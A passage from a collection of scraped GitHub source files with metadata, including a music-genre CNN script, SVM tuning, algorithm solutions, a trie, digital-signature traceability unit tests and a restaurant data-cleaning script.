os.path.splitext(ntpath.basename(path))[0]\n trackIDInt = int(trackIDStr)\n if os.path.exists(path) and (trackIDInt in testTrackID):\n currentClass = myFE.get_genre(trackIDInt)\n currentClassID = -1\n if classDict.get(currentClass) == None:\n continue\n else:\n currentClassID = classDict[currentClass]\n print('Loading track '+trackIDStr + ' with genre '+currentClass + ' ('+str(i+1)+'/'+str(testingSetSize)+')')\n currentSpectrogram = myAP.get_mel_spectrogram_with_cache(path)\n if(len(currentSpectrogram[0]) < spectrogramLowestCol):\n spectrogramLowestCol=len(currentSpectrogram[0])\n if(len(currentSpectrogram) < spectrogramLowestRow):\n spectrogramLowestRow=len(currentSpectrogram)\n\n testDataLst.append(currentSpectrogram)\n testClassStrLst.append(currentClass)\n testClassLst.append(currentClassID)\n testTrackIdLst.append(trackIDInt)\n testTrackIdStrLst.append(trackIDStr)\n i+=1\n if i >= testingSetSize:\n break\n print('Testing data loaded.')\n\n print('Processing data...')\n #Truncate the frame for transformation\n for i in range(0, len(trainDataLst)):\n spectrogram = trainDataLst[i]\n if len(spectrogram[0]) <= spectrogramLowestCol and len(spectrogram) <= spectrogramLowestRow:\n continue;\n while len(spectrogram[0]) > spectrogramLowestCol:\n spectrogram = np.delete(spectrogram, len(spectrogram[0])-1, 1)\n while len(spectrogram) > spectrogramLowestRow:\n spectrogram = np.delete(spectrogram, len(spectrogram)-1, 0)\n trainDataLst[i] = spectrogram\n\n for i in range(0, len(testDataLst)):\n spectrogram = testDataLst[i]\n if len(spectrogram[0]) <= spectrogramLowestCol and len(spectrogram) <= spectrogramLowestRow:\n continue;\n while len(spectrogram[0]) > spectrogramLowestCol:\n spectrogram = np.delete(spectrogram, len(spectrogram[0])-1, 1)\n while len(spectrogram) > spectrogramLowestRow:\n spectrogram = np.delete(spectrogram, len(spectrogram)-1, 0)\n testDataLst[i] = spectrogram\n\n #Transform the format of data into something that can be used\n num_rows = spectrogramLowestRow\n num_columns = spectrogramLowestCol\n num_channels = 1\n trainData = np.array(trainDataLst)\n trainData = trainData.reshape(trainData.shape[0], num_rows, num_columns, num_channels)\n trainClass = np.array(trainClassLst)\n\n testData = np.array(testDataLst)\n testData = testData.reshape(testData.shape[0], num_rows, num_columns, num_channels)\n testClass = np.array(testClassLst)\n\n print('Creating data model...')\n\n myModel = cnn((num_rows, num_columns, num_channels))\n print('Now training model...')\n history=myModel.train(trainData, trainClass)\n acc = history.history['accuracy']\n\n #Evaluate the model using test set. Code modifed based on https://towardsdatascience.com/a-simple-cnn-multi-image-classifier-31c463324fa\n print('Now testing the model we trained...')\n (eval_loss, eval_accuracy) = myModel.test(testData, testClass)\n print(\"[INFO] accuracy: {:.2f}%\".format(eval_accuracy * 100))\n print(\"[INFO] Loss: {}\".format(eval_loss))\n\n #Save the detailed prediction as a csv file - optional. Code modified based on https://realpython.com/python-csv/\n currentTimeStr = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n reverseclassDict = list(classDict.keys())\n\n trainPredictedClasses = myModel.predict(trainData)\n trainPredictedClassesStr = []\n for classID in trainPredictedClasses:\n trainPredictedClassesStr.append(reverseclassDict[classID])\n with open('trainset_prediction_result_'+ currentTimeStr +'.csv', mode='w') as csv_file:\n fieldnames = ['trackID', 'predictedClass', 'realClass', 'correct']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n writer.writeheader()\n for j in range(0, len(trainTrackIdStrLst)):\n #print('Track ' + str(testTrackIdLst[j]) + ' has genre ' + testClassStrLst[j] + ' and our model predict it has genre ' + predictedClassesStr[j])\n writer.writerow({'trackID': trainTrackIdStrLst[j], 'predictedClass': trainPredictedClassesStr[j], 'realClass': trainClassStrLst[j], 'correct': str(trainPredictedClassesStr[j] == trainClassStrLst[j])})\n\n testPredictedClasses = myModel.predict(testData)\n testPredictedClassesStr = []\n for classID in testPredictedClasses:\n testPredictedClassesStr.append(reverseclassDict[classID])\n with open('testset_prediction_result_'+ currentTimeStr + '.csv', mode='w') as csv_file:\n fieldnames = ['trackID', 'predictedClass', 'realClass', 'correct']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n writer.writeheader()\n for j in range(0, len(testTrackIdLst)):\n #print('Track ' + str(testTrackIdLst[j]) + ' has genre ' + testClassStrLst[j] + ' and our model predict it has genre ' + predictedClassesStr[j])\n writer.writerow({'trackID': testTrackIdStrLst[j], 'predictedClass': testPredictedClassesStr[j], 'realClass': testClassStrLst[j], 'correct': str(testPredictedClassesStr[j] == testClassStrLst[j])})\n epochs = range(1, len(acc) + 1)\n plt.plot(epochs, acc, 'b', label='Training accuracy (with spectrogram)')\n plt.title('CNN Training accuracy')\n plt.legend()\n plt.show()","repo_name":"park1996/Music-Classification-By-Genre","sub_path":"models/cnn/cnn_classification.py","file_name":"cnn_classification.py","file_ext":"py","file_size_in_byte":8678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18493781499","text":"# Erstellung des database. Hinterlegung der eingetragenen Werte in der Liste. Einträge in der Datenliste sollen auf einer neuen Zeile erscheinen und die Datenliste soll nicht jedesmal neu Überschrieben werden.\n#Quelle *1*\nfrom csv import writer\n\ndef to_csv(data_lst):\n with open(f'database.csv', 'a+', newline='', encoding='utf-8') as write_obj:\n csv_writer = writer(write_obj)\n csv_writer.writerow(data_lst)\n\n\n# Quelle *1*: https://realpython.com/python-csv/\n\n","repo_name":"timmordasini32/pro_2","sub_path":"tippspiel/datenbank.py","file_name":"datenbank.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40541801600","text":"import numpy as np\nimport cvxopt.solvers\nimport logging\nfrom kernel import Kernel\nfrom Vmatrix import Vmatrix\nfrom svmModified import SVMPredictor, SVMTrainer\nimport matplotlib as mp\nmp.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport itertools\nfrom split_data import Split\n\nnum_samples = 100\nnum_features = 2\ngrid_size = 20\nsamples = np.matrix(np.random.normal(size=num_samples*num_features).reshape(num_samples, num_features))\nx_min, x_max = samples[:,0].min()-1, samples[:,0].max()+1\ny_min, y_max = samples[:,1].min()-1, samples[:,1].max()+1\n\nlabels = 2*(samples.sum(axis=1)>0)-1\nc = [0.00001, 0.0001, 0.001, 0.01, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]\npara_select = len(c)\nfor mode in range(3,4):\n error_select = np.inf\n c_select = np.inf\n for s in range(para_select):\n trainer_temp = SVMTrainer(Kernel.linear(), c[s])\n\n splitM = Split()\n samples_train, samples_valid, labels_train, labels_valid, size_valid, size_training = splitM.K_fold(samples, labels, 5, 1)\n\n predictor_temp = trainer_temp.train(samples_train, labels_train, mode=mode)\n grid_size = 20\n x_min, x_max = samples_valid[:, 0].min() - 1, samples_valid[:, 0].max() + 1\n y_min, y_max = samples_valid[:, 1].min() - 1, samples_valid[:, 1].max() + 1\n xx, yy = np.meshgrid(np.linspace(x_min, x_max, grid_size), np.linspace(y_min, y_max,grid_size), indexing='ij')\n flatten = lambda m : np.array(m).reshape(-1)\n\n result_temp = []\n '''\n for (i, j) in itertools.product(range(grid_size), range(grid_size)):\n point = np.array([xx[i, j], yy[i, j]]).reshape(1,2)\n result_temp.append(predictor_temp.predict(point))\n '''\n error_temp = []\n for i in range(size_valid):\n point = samples_valid[i,:]\n result_temp.append(predictor_temp.predict(point))\n error_temp.append(np.abs(labels_valid[i]-predictor_temp.predict(point)))\n\n if(sum(error_temp)km):\n km=diz[\"CD456FF\"][i][2]\n imax=i\nprint(\"Mese con più km di CD456FF: \"+ diz[\"CD456FF\"][imax][0])\n","repo_name":"MatteoRanzani/python","sub_path":"noleggio_auto.py","file_name":"noleggio_auto.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22069880854","text":"import os\nimport csv\n\n\nfrom tqdm import tqdm\n\n\ndef load_labels(data_dir, split):\n with open(os.path.join(data_dir, '{}.csv'.format(split)), 'r') as fp:\n reader = csv.reader(fp)\n problems = list(reader)\n problems = problems[1:]\n return problems\n\n\ndef load_data(data_dir, split, split_csv):\n problems = list()\n for row in tqdm(split_csv):\n with open(os.path.join(data_dir, split, row[1]), 'r') as fp:\n problems.append(fp.read())\n return problems\n","repo_name":"AliOsm/AI-SOCO-Experiments","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24783991416","text":"\"\"\"\n이중우선순위큐\n\nhttps://school.programmers.co.kr/learn/courses/30/lessons/42628\n\"\"\"\nimport heapq\ndef solution(operations):\n \n removed = []\n min_heap = []\n max_heap = []\n answer = []\n idx = 0\n for o in operations:\n oper, data = o.split()\n if oper == \"I\":\n removed.append([False, int(data)])\n heapq.heappush(min_heap, (int(data), idx))\n heapq.heappush(max_heap, (-int(data), idx))\n idx += 1\n if oper == \"D\":\n if len(min_heap) == 0 or len(max_heap) == 0:\n continue\n if data == \"-1\":\n while min_heap:\n v, i = heapq.heappop(min_heap)\n if removed[i][0] == False:\n removed[i][0] = True\n break\n elif data == \"1\":\n while max_heap:\n v, i = heapq.heappop(max_heap)\n if removed[i][0] == False:\n removed[i][0] = True\n break\n \n candidates = []\n for r in removed:\n if r[0] == False:\n candidates.append(r[1])\n if candidates:\n return [max(candidates), min(candidates)]\n else:\n return [0,0]","repo_name":"dong5854/algorithm","sub_path":"programmers/level3/이중우선순위큐.py","file_name":"이중우선순위큐.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13284324897","text":"\"\"\"\nGiven a 0-indexed integer array nums of size n containing all numbers from 1 to n, return the number of increasing quadruplets.\nA quadruplet (i, j, k, l) is increasing if:\n\n0 <= i < j < k < l < n, and\nnums[i] < nums[k] < nums[j] < nums[l].\n\nExample 1:\nInput: nums = [1,3,2,4,5]\nOutput: 2\nExplanation:\n- When i = 0, j = 1, k = 2, and l = 3, nums[i] < nums[k] < nums[j] < nums[l].\n- When i = 0, j = 1, k = 2, and l = 4, nums[i] < nums[k] < nums[j] < nums[l].\nThere are no other quadruplets, so we return 2.\n\nExample 2:\nInput: nums = [1,2,3,4]\nOutput: 0\nExplanation: There exists only one quadruplet with i = 0, j = 1, k = 2, l = 3, but since nums[j] < nums[k], we return 0.\n\n\nConstraints:\n4 <= nums.length <= 4000\n1 <= nums[i] <= nums.length\nAll the integers of nums are unique. nums is a permutation.\n\nhints:\n1 Can you loop over all possible (j, k) and find the answer?\n2 We can pre-compute all possible (i, j) and (k, l) and store them in 2 matrices.\n3 The answer will the sum of prefix[j][k] * suffix[k][j].\n\nanalysis:\ndp[j] stores the count of all valid triplets (i, j, k) that satisfies i < j < k and nums[i] < nums[k] < nums[j] (132 Pattern) and using the current number in j.\nTC: O(N^2)\n\"\"\"\nfrom typing import List\n\n\nclass CountIncreasingQuadruplets:\n def countQuadruplets(self, nums: List[int]) -> int:\n n = len(nums)\n dp = [0] * n\n res = 0\n for j in range(n):\n prev_small = 0\n for i in range(j):\n if nums[i] < nums[j]: # 2 meets 4\n prev_small += 1\n res += dp[i] # add all 132 patterns count\n elif nums[i] > nums[j]: # 3 meets 2\n dp[i] += prev_small # add all 1?2 patterns count\n return res\n","repo_name":"DeanHe/Practice","sub_path":"LeetCodePython/CountIncreasingQuadruplets.py","file_name":"CountIncreasingQuadruplets.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73637124072","text":"import datetime\nimport random\nfrom unittest import TestCase\nimport uuid\n\nimport src.utils.util\nfrom src.utils import encryption_module as em\nimport pandas as pd\nfrom src.traceability_module.traceability_module import TraceabilityModule\nimport os\nimport binascii\n\nfrom src.utils.digital_signature import _get_hash, DigitalSignature\nfrom src.utils.util import registered_data_columns, transferred_data_columns, url_to_manager\n\n\nclass TestTraceabilityModule(TestCase):\n\n def setUp(self) -> None:\n # this method will be executed before EACH test method\n root = 'src'\n prefix = ''\n while not os.path.exists(f'{prefix}{root}'):\n prefix = f'../{prefix}'\n\n path_to_private_keys = f'{prefix}src/keys'\n path_to_public_keys = f'{prefix}src/keys'\n\n # we insert smashhit data into the records\n self.path_to_records_table = \"../../src/utils/records_table.csv\"\n self.table_columns = ['actor', 'uniform_resource_identifier', 'path_to_private_key', 'path_to_public_key']\n if os.path.exists(self.path_to_records_table):\n self.records_df = pd.DataFrame(columns=self.table_columns)\n\n actors = ['sender', 'receiver', 'own_smashhit', 'manager', 'native']\n for present in self.records_df['actor'].to_list():\n actors.remove(present)\n\n # for each actor we assign a random uniform_resource_identifier, private key and public key\n for actor in actors:\n uniform_resource_identifier = uuid.uuid1()\n private_key_filename = f'{uniform_resource_identifier}_ed25519'\n path_to_private_key = f'{path_to_private_keys}/{private_key_filename}'\n public_key_filename = f'{uniform_resource_identifier}_ed25519.pub'\n path_to_public_key = f'{path_to_public_keys}/{public_key_filename}'\n # creation of keys\n private_key = em.generate_private_key()\n em.save_private_key(private_key, path_to_private_key)\n public_key = em.generate_public_key(private_key)\n em.save_public_key(public_key, path_to_public_key)\n # insertion of the new record in table\n new_record = {'actor': actor, 'uniform_resource_identifier': uniform_resource_identifier,\n 'path_to_private_key': path_to_private_key, 'path_to_public_key': path_to_public_key}\n # ignore_index=True to avoid thinking about the index\n self.records_df = self.records_df.append(new_record, ignore_index=True)\n self.records_df = pd.DataFrame(self.records_df, columns=self.table_columns)\n self.records_df.to_csv(self.path_to_records_table, index=False)\n else:\n self.records_df = pd.read_csv(self.path_to_records_table)\n\n self.path_to_private_key_sender = self.records_df.loc[0, 'path_to_private_key'] # 0 = position of sender\n self.path_to_public_key_sender = self.records_df.loc[0, 'path_to_public_key']\n self.path_to_private_key_receiver = self.records_df.loc[1, 'path_to_private_key']\n self.path_to_public_key_receiver = self.records_df.loc[1, 'path_to_public_key']\n self.path_to_private_key_manager = self.records_df.loc[3, 'path_to_private_key']\n self.path_to_public_key_manager = self.records_df.loc[3, 'path_to_public_key']\n self.path_to_private_key_native = self.records_df.loc[4, 'path_to_private_key']\n self.path_to_public_key_native = self.records_df.loc[4, 'path_to_public_key']\n self.sender_id = self.records_df.loc[0, 'uniform_resource_identifier']\n self.receiver_id = self.records_df.loc[1, 'uniform_resource_identifier']\n self.manager_id = self.records_df.loc[3, 'uniform_resource_identifier']\n self.native_id = self.records_df.loc[4, 'uniform_resource_identifier']\n self.log_path_registered_data = f'{prefix}src/utils/registered_data.csv'\n self.log_path_transferred_data = f'{prefix}src/utils/transferred_data.csv'\n\n self.data = str.encode(f'this{random.randint(0, 15)}is{random.randint(0, 50)}the{random.randint(0, 1000)}data')\n self.hash_data = _get_hash(self.data)\n self.uniform_resource_identifier = self.native_id # very important\n self.consent_id = uuid.uuid1()\n self.contract_id = str(self.consent_id) + '_contract'\n self.origin = uuid.uuid1()\n\n self.private_key_sender = em.load_private_key(self.path_to_private_key_sender)\n self.public_key_sender = em.load_public_key(self.path_to_public_key_sender)\n\n self.private_key_receiver = em.load_private_key(self.path_to_private_key_receiver)\n self.public_key_receiver = em.load_private_key(self.path_to_public_key_receiver)\n\n self.private_key_manager = em.load_private_key(self.path_to_private_key_manager)\n self.public_key_manager = em.load_public_key(self.path_to_public_key_manager)\n\n date_time_obj = datetime.datetime.strptime('2022-06-10 08:15:27.243860', '%Y-%m-%d %H:%M:%S.%f')\n self.creation_time = date_time_obj.time()\n date_time_obj = datetime.datetime.strptime('2022-06-29 08:15:27.243860', '%Y-%m-%d %H:%M:%S.%f')\n self.expiration_time = date_time_obj.time()\n\n self.log_path_registered_data = f'{prefix}src/utils/registered_data.csv'\n self.log_path_transferred_data = f'{prefix}src/utils/transferred_data.csv'\n\n self.path_to_consents = f'{prefix}src/utils/consents.csv'\n\n def test_register_data(self):\n self.traceability_module = TraceabilityModule(path_to_private_key=self.path_to_private_key_manager,\n path_to_public_key=self.path_to_public_key_manager,\n url_to_manager=url_to_manager,\n own_smashhit_id=str(self.manager_id))\n digital_signature_manager = DigitalSignature(public_key=self.public_key_manager,\n private_key=self.private_key_manager)\n signed_hash_manager = digital_signature_manager.sign_data(self.hash_data)\n signed_hash_manager = binascii.hexlify(signed_hash_manager).decode('ascii')\n result = self.traceability_module.register_data(\n consent_id=str(self.consent_id),\n contract_id=str(self.contract_id),\n hash_data=str(self.hash_data),\n origin=str(self.origin),\n creation_time=self.creation_time,\n expiration_time=self.expiration_time,\n path_to_records_table=self.path_to_records_table\n )\n\n central_signature, uniform_resource_identifier = result[0], result[1]\n\n df = pd.read_csv(self.log_path_registered_data)\n index = len(df) - 1\n new_uniform_resource_identifier = df.loc[index, 'uniform_resource_identifier']\n\n self.assertTrue((signed_hash_manager == central_signature) &\n (str(uniform_resource_identifier) == new_uniform_resource_identifier))\n\n def test_notify_data_transfer(self):\n self.traceability_module = TraceabilityModule(own_smashhit_id=str(self.sender_id),\n path_to_private_key=self.path_to_private_key_sender,\n path_to_public_key=self.path_to_private_key_sender,\n url_to_manager=url_to_manager)\n # we create a row in registered data containing the sender (first-hop company) hash_data\n hash_data = self.hash_data\n smashhit = src.utils.util.get_record('own_smashhit')\n path_to_private_key_smashhit = smashhit['path_to_private_key']\n path_to_public_key_smashhit = smashhit['path_to_public_key']\n private_key_smashhit = em.load_private_key(path_to_private_key_smashhit)\n public_key_smashhit = em.load_private_key(path_to_public_key_smashhit)\n\n signed_hash = private_key_smashhit.sign(hash_data)\n signed_hash = binascii.hexlify(signed_hash).decode('ascii')\n if os.path.exists(self.log_path_registered_data):\n registered_data_df = pd.read_csv(self.log_path_registered_data)\n else:\n registered_data_df = pd.DataFrame(columns=registered_data_columns)\n new_data = {'smashhit_id': str(self.sender_id),\n 'uniform_resource_identifier': str(self.uniform_resource_identifier),\n 'hash_data': str(hash_data),\n 'signed_hash': str(signed_hash), 'consent_id': str(self.consent_id),\n 'contract_id': str(self.contract_id), 'origin': str(self.origin),\n 'creation_time': str(self.creation_time),\n 'expiration_time': str(self.expiration_time)}\n registered_data_df = registered_data_df.append(new_data, ignore_index=True)\n registered_data_df.to_csv(self.log_path_registered_data, index=False)\n\n data_sender = str(self.uniform_resource_identifier) + str(self.sender_id) + str(self.receiver_id)\n hash_data_sender = _get_hash(data_sender)\n signature_of_sender = self.private_key_sender.sign(hash_data_sender)\n signature_of_sender = binascii.hexlify(signature_of_sender).decode('ascii')\n\n var_msg = self.traceability_module.notify_data_transfer(\n uniform_resource_identifier=str(self.uniform_resource_identifier), receiver_id=str(self.receiver_id))\n\n\n df = pd.read_csv(self.log_path_transferred_data)\n\n index = len(df) - 1\n self.assertTrue(((df.loc[index, 'uniform_resource_identifier'] == str(self.uniform_resource_identifier))) &\n (df.loc[index, 'sender_id'] == str(self.sender_id)) &\n (df.loc[index, 'receiver_id'] == str(self.receiver_id)) &\n (df.loc[index, 'signature_of_sender'] == str(signature_of_sender)))\n\n def test_verify_received_data(self):\n self.traceability_module = TraceabilityModule(own_smashhit_id=str(self.receiver_id),\n path_to_private_key=self.path_to_private_key_receiver,\n path_to_public_key=self.path_to_private_key_receiver,\n url_to_manager=url_to_manager)\n # we create a row in registered data containing the sender (first-hop company) hash_data\n hash_data = self.hash_data\n signed_hash = self.private_key_sender.sign(hash_data)\n signed_hash = binascii.hexlify(signed_hash).decode('ascii')\n if os.path.exists(self.log_path_registered_data):\n registered_data_df = pd.read_csv(self.log_path_registered_data)\n else:\n registered_data_df = pd.DataFrame(columns=registered_data_columns)\n new_data = {'uniform_resource_identifier': self.uniform_resource_identifier, 'hash_data': hash_data,\n 'signed_hash': signed_hash, 'consent_id': self.consent_id, 'contract_id': self.contract_id,\n 'origin': self.origin, 'creation_time': self.creation_time, 'expiration_time': self.expiration_time}\n registered_data_df = registered_data_df.append(new_data, ignore_index=True)\n registered_data_df.to_csv(self.log_path_registered_data, index=False)\n\n data_sender = _get_hash(str(self.uniform_resource_identifier) + str(self.sender_id) + str(self.receiver_id))\n signature_of_sender = self.private_key_sender.sign(data_sender)\n signature_of_sender = binascii.hexlify(signature_of_sender).decode('ascii')\n\n # we create a row in transferred data containing the transferred data\n data = {\n 'uniform_resource_identifier': self.uniform_resource_identifier,\n 'sender_id': self.sender_id,\n 'receiver_id': self.receiver_id,\n 'signature_of_sender': signature_of_sender,\n 'signature_of_receiver': '',\n 'transfer_date_time': datetime.datetime.now(),\n 'confirm_date_time': ''\n }\n if os.path.exists(self.log_path_transferred_data):\n transferred_data_df = pd.read_csv(self.log_path_transferred_data)\n else:\n transferred_data_df = pd.DataFrame(columns=transferred_data_columns)\n transferred_data_df = transferred_data_df.append(data, ignore_index=True)\n transferred_data_df.to_csv(self.log_path_transferred_data, index=False)\n\n self.assertTrue('' == self.traceability_module.verify_received_data(hash_data=str(hash_data),\n uniform_resource_identifier=str(\n self.uniform_resource_identifier),\n sender_id=str(self.sender_id),\n signature_of_sender=signature_of_sender))\n","repo_name":"uttam1216/DataUseTraceabilty_LUH_UBO","sub_path":"unittests/positive_tests/test_traceability_module.py","file_name":"test_traceability_module.py","file_ext":"py","file_size_in_byte":13105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36546234217","text":"from LinkedList import LinkedList, create_sample_linked_lists\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef getNthItem(ll: LinkedList, position: int):\n \"\"\"\n\n :param position:\n :param ll:\n :return:\n\n TC : O(N)\n SC : O(1)\n \"\"\"\n\n if not ll.head:\n logging.info(\"Linked List is empty.\")\n\n return None\n\n temp = ll.head\n index = 1\n\n while temp and index < position:\n temp = temp.next\n index += 1\n\n if index < position:\n logging.info(\"Length of the Linked List is {}. Hence position {} does not exists. Please Enter a valid index\".format(\n index, position\n ))\n return None\n\n return temp.value\n\n\nif __name__ == '__main__':\n # print(ll1)\n # print(ll2)\n # print(ll3)\n\n ll1, ll2, ll3 = create_sample_linked_lists()\n\n position = 3\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll1, position, getNthItem(ll1, position)\n ))\n\n position = 3\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll2, position, getNthItem(ll2, position)\n ))\n\n position = 3\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll3, position, getNthItem(ll3, position)\n ))\n\n position = 15\n print(\"For a given linked List \\\"{}\\\" element on position {} is {}\".format(\n ll3, position, getNthItem(ll3, position)\n ))\n","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/LinkedList/1GetNthnodeinalinkedlist.py","file_name":"1GetNthnodeinalinkedlist.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73840999591","text":"def house(color, start_x, start_y, side_y_size, side_x_size, brick_x_size, brick_y_size, width):\r\n import simple_draw as sd\r\n from village import wall\r\n\r\n # вызываем стену\r\n\r\n wall.wall(color=color, start_x=start_x, start_y=start_y, side_y_size=side_y_size, side_x_size=side_x_size,\r\n brick_x_size=brick_x_size, brick_y_size=brick_y_size, width=width)\r\n\r\n house_length = wall.wall_length[0]\r\n end_y_wall = wall.wall_length[1]\r\n\r\n # рисуем крышу\r\n point_1 = sd.get_point(x=start_x, y=end_y_wall + brick_y_size)\r\n point_2 = sd.get_point(x=start_x + house_length * .3, y=side_y_size + + brick_y_size * 3)\r\n point_3 = sd.get_point(x=house_length, y=end_y_wall + brick_y_size)\r\n point_list = [point_1, point_2, point_3]\r\n sd.polygon(point_list=point_list, color=sd.COLOR_DARK_RED, width=0)\r\n\r\n # рисуем окно\r\n window_point = sd.get_point(x=side_x_size / 1.5, y=side_y_size / 2)\r\n sd.square(left_bottom=window_point, side=side_y_size / 3, color=sd.COLOR_WHITE, width=0)\r\n\r\n # рисуем землю\r\n point_1 = sd.get_point(x=0, y=0)\r\n point_2 = sd.get_point(x=0, y=100)\r\n point_3 = sd.get_point(x=sd.resolution[0], y=100)\r\n point_4 = sd.get_point(x=sd.resolution[0], y=0)\r\n point_list = [point_1, point_2, point_3, point_4]\r\n sd.polygon(point_list=point_list, color=sd.COLOR_DARK_ORANGE, width=0)\r\n","repo_name":"esurkova90/practicing","sub_path":"village/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3385167754","text":"# Program for Trie Insert and Search\n\n# Trie node\nclass TrieNode:\n\tdef __init__(self):\n\t\tself.children = [None]*26\n\t\tself.isEndOfWord = False\n\n# Trie Class\nclass Trie:\n\tdef __init__(self):\n\t\tself.root = self.getNode()\n\n\tdef getNode(self):\n\t\treturn TrieNode()\n\n\tdef toIndex(self, ch):\n\t\treturn ord(ch)-ord('a')\n\n\t# Function to Insert into Trie\n\tdef insert(self, key):\n\t\tnode = self.root\n\t\tlength = len(key)\n\n\t\tfor i in range(length):\n\t\t\tidx = self.toIndex(key[i])\n\t\t\tif not node.children[idx]:\n\t\t\t\tnode.children[idx] = self.getNode()\n\t\t\tnode = node.children[idx]\n\t\tnode.isEndOfWord = True\n\n\t# Function for Trie Search\n\tdef search(self, key):\n\t\tnode = self.root\n\t\tlength = len(key)\n\n\t\tfor i in range(length):\n\t\t\tidx = self.toIndex(key[i])\n\t\t\tif not node.children[idx]:\n\t\t\t\treturn False\n\t\t\tnode = node.children[idx]\n\t\treturn node!=None and node.isEndOfWord\n\n\n# Main function \n# To test code, please edit keys list and print statements for search\ndef main():\n\tkeys = [\"the\",\"apple\",\"there\",\"hello\",\"world\", \"by\",\"python\"]\n\toutput = [\"Not present in trie\", \"Present in trie\"]\n\n\t# Construct Trie\n\ttrie = Trie()\n\n\tfor key in keys:\n\t\ttrie.insert(key)\n\n\n\t# Search in trie\n\tprint(\"{} => {}\".format(\"the\", output[trie.search(\"the\")]))\n\tprint(\"{} => {}\".format(\"hi\", output[trie.search(\"hi\")]))\n\tprint(\"{} => {}\".format(\"apple\", output[trie.search(\"apple\")]))\n\tprint(\"{} => {}\".format(\"man\", output[trie.search(\"man\")]))\n\nif __name__ == '__main__':\n\tmain()\n\n## Sample Output ##\n# the => Present in trie\n# hi => Not present in trie\n# apple => Present in trie\n# man => Not present in trie","repo_name":"ahampriyanshu/algo-ds-101","sub_path":"Algorithms/Searching/Trie-Search/Trie_Search.py","file_name":"Trie_Search.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"72"} +{"seq_id":"22157082582","text":"import folium as fo\nfrom streamlit_folium import folium_static\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport plotly.express as px\nimport streamlit as st\n\ncountries = {\n1: \"India\",\n14: \"Australia\",\n30: \"Brazil\",\n37: \"Canada\",\n94: \"Indonesia\",\n148: \"New Zeland\",\n162: \"Philippines\",\n166: \"Qatar\",\n184: \"Singapure\",\n189: \"South Africa\",\n191: \"Sri Lanka\",\n208: \"Turkey\",\n214: \"United Arab Emirates\",\n215: \"England\",\n216: \"United States of America\",\n}\n\ndef country_name(country_id):\n return countries[country_id]\n\ndef get_price_range_description(price_range):\n if price_range == 1:\n return \"cheap\"\n elif price_range == 2:\n return \"normal\"\n elif price_range == 3:\n return \"expensive\"\n else:\n return \"gourmet\"\n\ndef convert_to_dollar(currency, price):\n if currency == 'Botswana Pula(P)':\n return price*0.076\n elif currency == 'Brazilian Real(R$)':\n return price*0.19\n elif currency == 'Dollar($)':\n return price*1\n elif currency == 'Emirati Diram(AED)':\n return price*0.27\n elif currency == 'Indian Rupees(Rs.)':\n return price*0.012\n elif currency == 'Indonesian Rupiah(IDR)':\n return price*0.000066\n elif currency == 'NewZealand($)':\n return price*0.623515\n elif currency == 'Pounds(£)':\n return price*1.24\n elif currency == 'Qatari Rial(QR)':\n return price*0.27\n elif currency == 'Rand(R)':\n return price*0.056\n elif currency == 'Sri Lankan Rupee(LKR)':\n return price*0.0031\n elif currency == 'Turkish Lira(TL)':\n return price*0.0052\n else:\n return price\n\ndef clear_data(df):\n # Limpeza\n # Remove itens duplicados\n df1 = df.drop_duplicates()\n\n # Reseta index para não criar o problema de itens \"pulados\" pelo filtro.\n # O inplace=True serve para executar as alterações no próprio dataframe (e não como retorno), e\n # o drop=True serve para ele não gerar uma nova coluna de index.\n df1.reset_index(inplace=True, drop=True)\n\n # Disable chained assignments, evita o warning de cópia sobre uma parte do dataframe.\n pd.options.mode.chained_assignment = None\n\n # A coluna do dataframe possui várias informações separadas por vírgulas. Essa função remove as\n # demais e atribui apenas o primeiro valor.\n # Possível utilização também da função assign:\n # df = df.assign(my_col=lambda d: d['my_col'].astype(int))\n df1['Cuisines'] = df1.loc[:, 'Cuisines'].apply(lambda x: str(x).split(',')[0])\n\n # Cria a coluna com o nome do país baseado na função definida acima.\n df1['Country Name'] = df1.loc[:, 'Country Code'].apply(lambda x: country_name(x))\n\n # Cria a coluna com a descrição da faixa de preço baseado na função definida acima.\n df1['Price Range Description'] = df1.loc[:, 'Price range'].apply(lambda x: get_price_range_description(x))\n\n # Acertando um valor errado em um restaurante na Austrália.\n df1.loc[(df1['Country Name']=='Australia') & (df1['Average Cost for two']==25000017.0), 'Average Cost for two']=250\n\n # Cria a coluna com o preço em dólar baseado na função definida acima.\n df1['Price in Dollar for two'] = df1.loc[:, ['Currency', 'Average Cost for two']].apply(lambda x: 